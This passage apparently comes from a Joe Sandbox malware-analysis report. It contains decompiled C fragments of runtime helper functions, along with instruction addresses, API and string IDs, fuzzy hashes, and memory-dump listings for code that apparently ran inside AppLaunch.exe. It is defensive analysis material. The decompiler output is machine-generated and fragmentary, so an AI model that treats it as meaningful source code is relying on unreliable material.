								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E009FB9D8(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00A007E9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                                                                                                                                                                          0x009fbe02
                                                                                                                                                                          0x009fbe02
                                                                                                                                                                          0x009fbe09
                                                                                                                                                                          0x009fbe12
                                                                                                                                                                          0x009fbf31
                                                                                                                                                                          0x009fbe18
                                                                                                                                                                          0x009fbe1a
                                                                                                                                                                          0x009fbe24
                                                                                                                                                                          0x009fbe27
                                                                                                                                                                          0x009fbe2d
                                                                                                                                                                          0x009fbe37
                                                                                                                                                                          0x009fbe5c
                                                                                                                                                                          0x009fbe61
                                                                                                                                                                          0x009fbe66
                                                                                                                                                                          0x009fbf2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf2e
                                                                                                                                                                          0x009fbe66
                                                                                                                                                                          0x009fbe37
                                                                                                                                                                          0x009fbe6c
                                                                                                                                                                          0x009fbe6f
                                                                                                                                                                          0x009fbe72
                                                                                                                                                                          0x009fbe78
                                                                                                                                                                          0x009fbe7e
                                                                                                                                                                          0x009fbe90
                                                                                                                                                                          0x009fbe95
                                                                                                                                                                          0x009fbe98
                                                                                                                                                                          0x009fbe9b
                                                                                                                                                                          0x009fbe9e
                                                                                                                                                                          0x009fbea1
                                                                                                                                                                          0x009fbea7
                                                                                                                                                                          0x009fbead
                                                                                                                                                                          0x009fbeb0
                                                                                                                                                                          0x009fbeb3
                                                                                                                                                                          0x009fbec2
                                                                                                                                                                          0x009fbec3
                                                                                                                                                                          0x009fbec3
                                                                                                                                                                          0x009fbec8
                                                                                                                                                                          0x009fbedb
                                                                                                                                                                          0x009fbedd
                                                                                                                                                                          0x009fbee2
                                                                                                                                                                          0x009fbeed
                                                                                                                                                                          0x009fbeef
                                                                                                                                                                          0x009fbef1
                                                                                                                                                                          0x009fbf0d
                                                                                                                                                                          0x009fbf12
                                                                                                                                                                          0x009fbf15
                                                                                                                                                                          0x009fbf15
                                                                                                                                                                          0x009fbeed
                                                                                                                                                                          0x009fbee2
                                                                                                                                                                          0x009fbf1b
                                                                                                                                                                          0x009fbf1c
                                                                                                                                                                          0x009fbf1f
                                                                                                                                                                          0x009fbf22
                                                                                                                                                                          0x009fbf25
                                                                                                                                                                          0x009fbf28
                                                                                                                                                                          0x009fbeb3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbea7
                                                                                                                                                                          0x009fbf32
                                                                                                                                                                          0x009fbf37
                                                                                                                                                                          0x009fbf3b
                                                                                                                                                                          0x009fbf3e
                                                                                                                                                                          0x009fbf3f
                                                                                                                                                                          0x009fbf40
                                                                                                                                                                          0x009fbf41
                                                                                                                                                                          0x009fbf46
                                                                                                                                                                          0x009fbfbe
                                                                                                                                                                          0x009fbfc0
                                                                                                                                                                          0x009fbf48
                                                                                                                                                                          0x009fbf48
                                                                                                                                                                          0x009fbf4e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf50
                                                                                                                                                                          0x009fbf53
                                                                                                                                                                          0x009fbf56
                                                                                                                                                                          0x009fbf5d
                                                                                                                                                                          0x009fbf60
                                                                                                                                                                          0x009fbf64
                                                                                                                                                                          0x009fbf96
                                                                                                                                                                          0x009fbf99
                                                                                                                                                                          0x009fbfa0
                                                                                                                                                                          0x009fbfa6
                                                                                                                                                                          0x009fbfb0
                                                                                                                                                                          0x009fbfb9
                                                                                                                                                                          0x009fbfb9
                                                                                                                                                                          0x009fbfb0
                                                                                                                                                                          0x009fbfa6
                                                                                                                                                                          0x009fbfba
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf66
                                                                                                                                                                          0x009fbf69
                                                                                                                                                                          0x009fbf69
                                                                                                                                                                          0x009fbf6d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf71
                                                                                                                                                                          0x009fbf85
                                                                                                                                                                          0x009fbf85
                                                                                                                                                                          0x009fbf73
                                                                                                                                                                          0x009fbf73
                                                                                                                                                                          0x009fbf79
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf7b
                                                                                                                                                                          0x009fbf7b
                                                                                                                                                                          0x009fbf7e
                                                                                                                                                                          0x009fbf83
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf83
                                                                                                                                                                          0x009fbf79
                                                                                                                                                                          0x009fbf8e
                                                                                                                                                                          0x009fbf90
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x009fbf92
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf90
                                                                                                                                                                          0x009fbf89
                                                                                                                                                                          0x009fbf8b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf8b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fbf56
                                                                                                                                                                          0x009fbf4e
                                                                                                                                                                          0x009fbfc1
                                                                                                                                                                          0x009fbfc5
                                                                                                                                                                          0x009fbfc5

                                                                                                                                                                          APIs
                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 009FBE27
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                          • Opcode ID: cdefdc6672ec12ea68afe1c1991bdb2aa421c63b62d9d421f01c1ec77c922042
                                                                                                                                                                          • Instruction ID: 271e936b051988d14c0cb73bc1287aa7756a18ce4823d261210f6dbdf4c8ca51
                                                                                                                                                                          • Opcode Fuzzy Hash: cdefdc6672ec12ea68afe1c1991bdb2aa421c63b62d9d421f01c1ec77c922042
                                                                                                                                                                          • Instruction Fuzzy Hash: C141487190020DAFCF15DF98CD81AEEBBB9BF48304F158059FA15A7261D3359950DF90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F3230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E009F3230() {
				char _v4;
				void* __ecx;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t8;
				intOrPtr* _t11;

				_t11 = _t8;
				if( *_t11 == 0) {
					E009F6A1B( &_v4, 0);
					if( *_t11 == 0) {
						_t6 =  *0xa45b80; // 0x3
						_t7 = _t6 + 1;
						 *0xa45b80 = _t7;
						 *_t11 = _t7;
					}
					E009F6A73( &_v4);
				}
				return  *_t11;
			}









                                                                                                                                                                          0x009f3232
                                                                                                                                                                          0x009f3237
                                                                                                                                                                          0x009f323f
                                                                                                                                                                          0x009f3247
                                                                                                                                                                          0x009f3249
                                                                                                                                                                          0x009f324e
                                                                                                                                                                          0x009f324f
                                                                                                                                                                          0x009f3254
                                                                                                                                                                          0x009f3254
                                                                                                                                                                          0x009f325a
                                                                                                                                                                          0x009f325a
                                                                                                                                                                          0x009f3263

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F323F
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F325A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                          • String ID: ios_base::badbit set
                                                                                                                                                                          • API String ID: 593203224-3882152299
                                                                                                                                                                          • Opcode ID: 72e80f3bb998b39ad39e9a1397e2894930c362d6851527cb4993df519d9b37d2
                                                                                                                                                                          • Instruction ID: 9ecc0f466bb8e2a886afc50492592c4b8f4738aba52131f904d94ac73e54322e
                                                                                                                                                                          • Opcode Fuzzy Hash: 72e80f3bb998b39ad39e9a1397e2894930c362d6851527cb4993df519d9b37d2
                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE08C34800618DFC328DF64C841BE1B3E4FBA4360F10942EE2D5931A1FBB09A81CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 0A3170C0 Relevance: 4.1, Strings: 3, Instructions: 332COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8^Ol$8^Ol$|
                                                                                                                                                                          • API String ID: 0-910341651
                                                                                                                                                                          • Opcode ID: 7b4e41a4cfcf1b65610fbc13c543c4ab8ea883bef103a09cdded0fe5af0dbd7d
                                                                                                                                                                          • Instruction ID: 42cf8f4e4fa2e0002992c8567e192218b1a626831d45a2592a26b9c6d5469ea8
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b4e41a4cfcf1b65610fbc13c543c4ab8ea883bef103a09cdded0fe5af0dbd7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 19F1C470A012288FEB68DF64C950BDEB7B2FF89304F1085A9C549AB751DB319E85CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A317700 Relevance: 3.0, Strings: 2, Instructions: 525COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8^Ol$|
                                                                                                                                                                          • API String ID: 0-3368856164
                                                                                                                                                                          • Opcode ID: be0555dbff190942687f038aa1c99af270699f1431e03fae6f4897fe0ba4626e
                                                                                                                                                                          • Instruction ID: d0a097d2cbf414379dc1684a4f5ba0175f0274aeae65fd8951f789db82492349
                                                                                                                                                                          • Opcode Fuzzy Hash: be0555dbff190942687f038aa1c99af270699f1431e03fae6f4897fe0ba4626e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C42C274E052288FDB68DF64C894BDEB7B2AF89304F1084E9D50AAB750DB315E85CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3161D9 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0e2d3cee66dd4d55b5f224c58d903837715d868ff4f6bdc951445fcef4175658
                                                                                                                                                                          • Instruction ID: 23383052973994a174e1a53ee5d1db680e6ac521265c94021a82f126153a5b59
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e2d3cee66dd4d55b5f224c58d903837715d868ff4f6bdc951445fcef4175658
                                                                                                                                                                          • Instruction Fuzzy Hash: EE229E74E012688FDB64DF68C890BDDBBB2BB89304F1081EAD509AB751DB319E85CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318268 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 49feb735c7a233a425ef9a576256e2b02e4f58c6ded13db48d27860b62004fbf
                                                                                                                                                                          • Instruction ID: bd76a3539d0fc437ef84db8ae8a16d86e675194942bfc4872ff38f1647dfc9d1
                                                                                                                                                                          • Opcode Fuzzy Hash: 49feb735c7a233a425ef9a576256e2b02e4f58c6ded13db48d27860b62004fbf
                                                                                                                                                                          • Instruction Fuzzy Hash: 12D1B074E02218CFDB68DFA5D888B9DBBB2FF89305F1081AAD409A7350DB359985CF15
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A319998 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f36099ec0c86f29480408f292403c01ec3d08c34b5d1e5910e475f74275d83ac
                                                                                                                                                                          • Instruction ID: a347b199a848c1eeb1caac4259ddf6be45af9970e0cd3309fc6d7ef209f28bc9
                                                                                                                                                                          • Opcode Fuzzy Hash: f36099ec0c86f29480408f292403c01ec3d08c34b5d1e5910e475f74275d83ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 0AC10470E05258CFDB28DFA4C890B9DBBB2BF89304F1085A9C449AB755DB349986CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3170B0 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 03dfec206406cab58a847e936179488feecd5c534b948986d39e97f695aa7ef4
                                                                                                                                                                          • Instruction ID: 9ecd5f580a82b497b561610f1e8f42a4ac2ec3ec7a5bf65a74fd34cd4c0a6b39
                                                                                                                                                                          • Opcode Fuzzy Hash: 03dfec206406cab58a847e936179488feecd5c534b948986d39e97f695aa7ef4
                                                                                                                                                                          • Instruction Fuzzy Hash: 76A1E670E052288FEB28DFA0D850BDEBBB2FF89304F1081A9C5496B755DB315E858F91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB0048 Relevance: 34.4, Strings: 27, Instructions: 674COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl$xPOl
                                                                                                                                                                          • API String ID: 0-3974012715
                                                                                                                                                                          • Opcode ID: aade7c756b2035987b0dfd56fb8a864e7101125dfd34ced3ece9b3abe7dae9ef
                                                                                                                                                                          • Instruction ID: ef928189646b13a1a28f39b20fc60b5cabf200dcb5729d9f34b2b25521fe2cab
                                                                                                                                                                          • Opcode Fuzzy Hash: aade7c756b2035987b0dfd56fb8a864e7101125dfd34ced3ece9b3abe7dae9ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D426B307047148FCB24EB64D0909AEBBA2EFC5718B42496CD6479FB94CBB5EC058BC6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB14DA Relevance: 12.8, Strings: 10, Instructions: 337COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: , $D $\ $xPOl$xPOl$| $| $| $| $|
                                                                                                                                                                          • API String ID: 0-3963092361
                                                                                                                                                                          • Opcode ID: 8e74d1e85a2d7619dce7fdf30c617fb5a60b9b7f896748bd2ca2fc615a65f4f9
                                                                                                                                                                          • Instruction ID: 1042b9033cbb43794b1a2936111d4b1f74f86275c76349ae05ae61421391bd1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e74d1e85a2d7619dce7fdf30c617fb5a60b9b7f896748bd2ca2fc615a65f4f9
                                                                                                                                                                          • Instruction Fuzzy Hash: 75C1E4747082058FCB14DB68C464EBEB7A6EF89314F0588A9E6468F3E2CFB4DC458752
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A316C00 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: hX%$W%
                                                                                                                                                                          • API String ID: 0-2991548319
                                                                                                                                                                          • Opcode ID: b64ccc20640077246dadafd71848ae0de59486ef769a4d323a494cbbbc14ebdd
                                                                                                                                                                          • Instruction ID: 276e3254b94e13f6caa651d0a742085be34bb8f3f7f499e11c5817d247fd37ed
                                                                                                                                                                          • Opcode Fuzzy Hash: b64ccc20640077246dadafd71848ae0de59486ef769a4d323a494cbbbc14ebdd
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B51ED70E01218DFCB08DFA5D498AEDBBB2FF89311F10856AE416B7290DB755985CF50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A316C10 Relevance: 2.6, Strings: 2, Instructions: 129COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: hX%$W%
                                                                                                                                                                          • API String ID: 0-2991548319
                                                                                                                                                                          • Opcode ID: e3f301592a5651da851cb7ebbf29ec36ac7ad800c463443b7446129fa176aedd
                                                                                                                                                                          • Instruction ID: 49b308a2b3d8e52ee9120db6c45c45b7df5ba44e04bed76973532f4d615ad256
                                                                                                                                                                          • Opcode Fuzzy Hash: e3f301592a5651da851cb7ebbf29ec36ac7ad800c463443b7446129fa176aedd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D51CB74E01218DFCB08DFA4D498AEDBBB2FF89301F508429E416B7290DB755A81CF90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB1AF8 Relevance: 1.4, Instructions: 1438COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e2afd0183d14872fd28c3e73987d6c610aeb92be53ff9f71ca6ddf017ee4ffe
                                                                                                                                                                          • Instruction ID: 5ed6ce59a1281d825cb51c54831a3fbe18998b5b25ed1af8afa04e2eb6ed112a
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2afd0183d14872fd28c3e73987d6c610aeb92be53ff9f71ca6ddf017ee4ffe
                                                                                                                                                                          • Instruction Fuzzy Hash: DDC28174B001189FCB14DF64C890EEDBBB6EF58704F51809AE61AAB3A1CB71AD81CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31ADA0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: |
                                                                                                                                                                          • API String ID: 0-2590032420
                                                                                                                                                                          • Opcode ID: e0dd7a94a8ef0a68702491d57eaebc2a4996c2947ea287cd5b17f1018a342798
                                                                                                                                                                          • Instruction ID: f0abb5779f41fead3a593e4572dfeea07afb859f2aabeee11d7d6d741c99e867
                                                                                                                                                                          • Opcode Fuzzy Hash: e0dd7a94a8ef0a68702491d57eaebc2a4996c2947ea287cd5b17f1018a342798
                                                                                                                                                                          • Instruction Fuzzy Hash: F2510774E022189FDB18DFB4E8949DDBBB2FF89305F20802AD415AB755DB31A845CF90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31ADB0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: |
                                                                                                                                                                          • API String ID: 0-2590032420
                                                                                                                                                                          • Opcode ID: cc353e4b0125546837a91c584b26bc38762348895e99effaa9eac75ca84f5847
                                                                                                                                                                          • Instruction ID: 4b2986cb1eb2396d85db69dc014608b5fda3c9256b6d0c736a6c8ed08f0868c6
                                                                                                                                                                          • Opcode Fuzzy Hash: cc353e4b0125546837a91c584b26bc38762348895e99effaa9eac75ca84f5847
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51D274E052189FDB18DFA5E8909DEBBB2FF89304F60802AD416AB755DB31A845CF90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A319F5F Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: H_%
                                                                                                                                                                          • API String ID: 0-270729146
